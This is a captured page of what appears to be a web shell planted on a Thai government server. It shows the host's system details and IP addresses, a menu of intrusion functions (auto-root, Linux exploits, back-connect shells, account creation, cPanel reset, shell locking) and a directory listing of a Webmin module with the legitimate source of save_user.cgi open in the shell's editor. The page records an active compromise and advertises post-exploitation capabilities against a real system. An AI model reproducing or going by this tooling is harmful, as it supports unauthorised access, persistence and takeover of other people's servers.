Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
htaccess-htpasswd /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
1.76
KB
-rw-r--r--
acl_security.pl
1.19
KB
-rwxr-xr-x
cgi_args.pl
838
B
-rwxr-xr-x
config
104
B
-rw-r--r--
config-windows
104
B
-rw-r--r--
config.info
404
B
-rw-r--r--
config.info.bg
469
B
-rw-r--r--
config.info.bg.UTF-8
736
B
-rw-r--r--
config.info.ca
458
B
-rw-r--r--
config.info.ca.UTF-8
464
B
-rw-r--r--
config.info.cz
414
B
-rw-r--r--
config.info.cz.UTF-8
438
B
-rw-r--r--
config.info.de
540
B
-rw-r--r--
config.info.de.UTF-8
540
B
-rw-r--r--
config.info.es
458
B
-rw-r--r--
config.info.es.UTF-8
458
B
-rw-r--r--
config.info.fi
0
B
-rw-r--r--
config.info.fr
193
B
-rw-r--r--
config.info.fr.UTF-8
193
B
-rw-r--r--
config.info.hu
403
B
-rw-r--r--
config.info.hu.UTF-8
425
B
-rw-r--r--
config.info.ja_JP.UTF-8
521
B
-rw-r--r--
config.info.ja_JP.euc
397
B
-rw-r--r--
config.info.ko_KR.UTF-8
387
B
-rw-r--r--
config.info.ko_KR.euc
312
B
-rw-r--r--
config.info.ms
0
B
-rw-r--r--
config.info.nl
451
B
-rw-r--r--
config.info.nl.UTF-8
451
B
-rw-r--r--
config.info.no
435
B
-rw-r--r--
config.info.no.UTF-8
435
B
-rw-r--r--
config.info.tr
352
B
-rw-r--r--
config.info.zh_TW.Big5
133
B
-rw-r--r--
config.info.zh_TW.UTF-8
169
B
-rw-r--r--
defaultacl
32
B
-rw-r--r--
delete.cgi
1.17
KB
-rwxr-xr-x
edit_dir.cgi
4.02
KB
-rwxr-xr-x
edit_group.cgi
1.3
KB
-rwxr-xr-x
edit_user.cgi
1.58
KB
-rwxr-xr-x
htaccess-lib.pl
3.83
KB
-rwxr-xr-x
htpasswd-file-lib.pl
6.18
KB
-rwxr-xr-x
index.cgi
4.49
KB
-rwxr-xr-x
log_parser.pl
475
B
-rwxr-xr-x
md5-lib.pl
6.47
KB
-rwxr-xr-x
module.info
214
B
-rw-r--r--
module.info.ca
126
B
-rw-r--r--
module.info.ca.UTF-8
138
B
-rw-r--r--
module.info.cz
31
B
-rw-r--r--
module.info.cz.UTF-8
42
B
-rw-r--r--
module.info.de
149
B
-rw-r--r--
module.info.de.UTF-8
161
B
-rw-r--r--
module.info.es
35
B
-rw-r--r--
module.info.es.UTF-8
41
B
-rw-r--r--
module.info.fi
33
B
-rw-r--r--
module.info.fi.UTF-8
39
B
-rw-r--r--
module.info.fr
48
B
-rw-r--r--
module.info.fr.UTF-8
54
B
-rw-r--r--
module.info.hu
37
B
-rw-r--r--
module.info.hu.UTF-8
46
B
-rw-r--r--
module.info.ja_JP.UTF-8
54
B
-rw-r--r--
module.info.ja_JP.euc
41
B
-rw-r--r--
module.info.ko_KR.UTF-8
41
B
-rw-r--r--
module.info.ko_KR.euc
32
B
-rw-r--r--
module.info.ms
33
B
-rw-r--r--
module.info.ms.UTF-8
39
B
-rw-r--r--
module.info.ms_MY
125
B
-rw-r--r--
module.info.ms_MY.UTF-8
137
B
-rw-r--r--
module.info.nl
35
B
-rw-r--r--
module.info.nl.UTF-8
41
B
-rw-r--r--
module.info.no
33
B
-rw-r--r--
module.info.no.UTF-8
39
B
-rw-r--r--
module.info.zh_TW.Big5
29
B
-rw-r--r--
save_dir.cgi
8.16
KB
-rwxr-xr-x
save_group.cgi
1.28
KB
-rwxr-xr-x
save_user.cgi
1.69
KB
-rwxr-xr-x
search.cgi
1.81
KB
-rwxr-xr-x
useradmin_update.pl
1.75
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : save_user.cgi
#!/usr/bin/perl # save_user.cgi # Create, update or delete a password file user require './htaccess-lib.pl'; &ReadParse(); &error_setup($text{'save_err'}); @dirs = &list_directories(); ($dir) = grep { $_->[0] eq $in{'dir'} } @dirs; &can_access_dir($dir->[0]) || &error($text{'dir_ecannot'}); &lock_file($dir->[1]); &switch_user(); $users = $dir->[2] == 3 ? &list_digest_users($dir->[1]) : &list_users($dir->[1]); if (!$in{'new'}) { $user = $users->[$in{'idx'}]; $loguser = $user->{'user'}; } else { $loguser = $in{'htuser'}; } if ($in{'delete'}) { # Just delete this user &delete_user($user); } else { # Validate inputs $in{'htuser'} || &error($text{'save_euser1'}); $in{'htuser'} =~ /:/ && &error($text{'save_euser2'}); if ($in{'new'} || $user->{'user'} ne $in{'htuser'}) { ($clash) = grep { $_->{'user'} eq $in{'htuser'} } @$users; $clash && &error($text{'save_eclash'}); } !$in{'htpass_def'} && $in{'htpass'} =~ /:/ && &error($text{'save_epass'}); # Actually save $user->{'user'} = $in{'htuser'}; if (!$in{'htpass_def'}) { if ($dir->[2] == 3) { $user->{'pass'} = &digest_password($in{'htuser'}, $in{'dom'}, $in{'htpass'}); } else { $user->{'pass'} = &encrypt_password( $in{'htpass'}, undef, $dir->[2]); } } $user->{'enabled'} = $in{'enabled'}; if ($dir->[2] == 3) { $in{'dom'} =~ /^\S+$/ && $in{'dom'} !~ /:/ || &error($text{'save_edom'}); $user->{'dom'} = $in{'dom'}; $user->{'digest'} = 1; } if ($in{'new'}) { &create_user($user, $dir->[1]); } else { &modify_user($user); } } &switch_back(); &unlock_file($dir->[1]); &webmin_log($in{'delete'} ? "delete" : $in{'new'} ? "create" : "modify", "user", $loguser, $user); &redirect("");
Close